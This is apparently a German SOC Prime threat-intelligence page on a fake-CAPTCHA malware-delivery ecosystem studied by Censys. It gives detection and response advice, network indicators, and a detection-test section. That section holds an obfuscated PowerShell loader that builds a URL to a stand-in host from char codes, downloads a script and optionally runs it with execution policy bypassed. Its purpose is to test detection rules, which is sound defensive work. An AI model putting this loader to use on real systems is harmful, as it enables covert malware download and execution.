SOC Prime Bias: Medium

27 Jan. 2026 17:11
newspaper icon Censys

Leben im Web: Wie die Vertrauensinfrastruktur zur Malware-Lieferoberfläche wurde

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
Leben im Web: Wie die Vertrauensinfrastruktur zur Malware-Lieferoberfläche wurde
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht untersucht ein groß angelegtes „Fake Captcha“-Ökosystem, das vertrauenswürdige Web-Verifikationsschnittstellen nutzt, um schädliche Nutzlasten Bereitzustellen. Die visuelle Ähnlichkeit zwischen den Ködern ist kein zuverlässiges Attributionssignal, da dasselbe Frontend-Muster über verschiedenen Ausführungsketten liegen kann – PowerShell, VBScript, MSI-Installer und servergesteuerte Push-Benachrichtigungsübertragung. Mithilfe von hochvolumigem perceptual Hashing von Screenshots kartiert die Analyse, wie das Ökosystem organisiert ist und betont die Trennung zwischen der Benutzeroberfläche und dem zugrunde liegenden Nutzlast-Workflow. Verteidiger sollten von kosmetischen Indikatoren absehen und die Erkennung von Ausführungslogik und Infrastruktur priorisieren.

Untersuchung

Censys identifizierte 9.494 Fake Captcha-Assets und verwendete perceptual Hashing, um sie nach visueller Ähnlichkeit zu gruppieren, wobei ein dominanter Cloudflare-ähnlicher Cluster etwa 70% der beobachteten Seiten repräsentierte. Eine tiefere Überprüfung ergab 32 verschiedene Nutzlastvarianten, die von Zwischenablage-getriebenen Skripten über MSI-basierte Installer bis hin zu Matrix Push C2-artigen Push-Übertragungen reichten. Die Infrastrukturanalyse zeigte separate Back-End-Serverpools, die jede Technik unterstützten, wobei Beispiele wie 95.164.53.115 und ghost.nestdns.com zitiert wurden.

Minderung

Die Erkennung sollte nicht nur von visuellen Ködermerkmalen oder Zwischenablageverhalten abhängen. Stattdessen sollten ungewöhnliche Browser-Berechtigungsaufforderungen, PowerShell- oder VBScript-Download-und-Ausführungs-Muster, von verifikationsbezogenen URLs ausgehende MSI-Starts und Netzwerkverkehr zu bekannten Matrix Push C2-Endpunkten überwacht werden. Verdächtige Verifikationsseiten blockieren oder isolieren und Benutzer schulen, dass sie Browserberechtigungen nur auf vertrauenswürdigen, erwarteten Websites gewähren sollen.

Reaktion

Wenn eine Fake Captcha-Seite auftritt, sollten nachfolgende PowerShell-, VBScript- oder MSI-Ausführungen sowie Benachrichtigungsabonnementereignisse gemeldet werden. Endpunktaktivitäten mit Netzwerkindikatoren wie den referenzierten bösartigen IPs und Domains korrelieren. Betroffene Systeme isolieren, flüchtigen Speicher erfassen und eine forensische Analyse von abgerufenen Nutzlasten durchführen.

Angriffsablauf

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden

Benachrichtigen Sie Mich

Simulation Execution

Voraussetzung: Der Telemetrie- & Baseline-Preflight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Adversarial-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und der Text MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zur Fehldiagnose.

  • Angriffsnarrativ & Befehle:
    Der Angreifer muss eine bösartige Nutzlast abrufen, während er die Download-URL verbirgt. Er konstruiert die URL zur Laufzeit mit Zeichen-Codes, bettet den String „enc“ (oft in Base64-kodierten Nutzlasten gesehen) und verwendet dann Net.WebClient.DownloadFile um das Skript zu erhalten. Diese Technik entspricht dem Fokus der Regel auf „Verschleierung + Net.WebClient“. Schritte:

    1. Generieren der Download-URL durch Zeichenrekonstruktion: 
      $url = ([char]65+[char]108+[char]105+[char]99+[char]101+[char]46+[char]99+[char]111+[char]109) + "/malware.ps1"
    2. Erstellen einer Platzhaltervariablen, die den String „enc“ enthält, um den zweiten Erkennungsbegriff zu erfüllen: 
      $encTag = "enc"
    3. Auslösen des Downloads: 
      $wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, "$env:TEMPpayload.ps1")
    4. Ausführen der heruntergeladenen Nutzlast (optional für den Test): 
      powershell -ExecutionPolicy Bypass -File "$env:TEMPpayload.ps1"

    Die Anwesenheit von Net.WebClient.DownloadFile, dem Wort encund dem Gebrauch von [char]::FromCharCode (via der Abkürzung [char]) stellt sicher, dass die Regel ausgelöst wird.

  • Regression Test Script:

    # -------------------------------------------------
# Simulierter PowerShell-Loader – entspricht Sigma-Regel
# -------------------------------------------------
# 1. Rekonstruktion der Download-URL durch Zeichen-Codes
$url = ([char]104+[char]116+[char]116+[char]112+[char]115+[char]58+[char]47+[char]47+[char]109+[char]97+[char]108+[char]105+[char]99+[char]105+[char]111+[char]117+[char]115+[char]46+[char]99+[char]111+[char]109+[char]47+[char]112+[char]97+[char]121+[char]108+[char]111+[char]97+[char]100+[char]46+[char]112+[char]115+[char]49)
# Das obige ergibt: https://malicious.com/payload.ps1

# 2. Einfügen des „enc“-Tokens zur Erfüllung der Erkennungsregel
$encTag = "enc"

# 3. Download ausführen
$wc = New-Object System.Net.WebClient
$destination = "$env:TEMPpayload.ps1"
$wc.DownloadFile($url, $destination)

# 4. (Optional) Ausführung der Nutzlast
# powershell -ExecutionPolicy Bypass -File $destination

  • Bereinigungskommandos:

    # Entferne die heruntergeladene Nutzlast
$payloadPath = "$env:TEMPpayload.ps1"
if (Test-Path $payloadPath) {
    Remove-Item -Force $payloadPath
}

# Entferne das WebClient-Objekt (Garbage Collection wird automatisch gehandhabt)
Write-Host "Bereinigung abgeschlossen."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten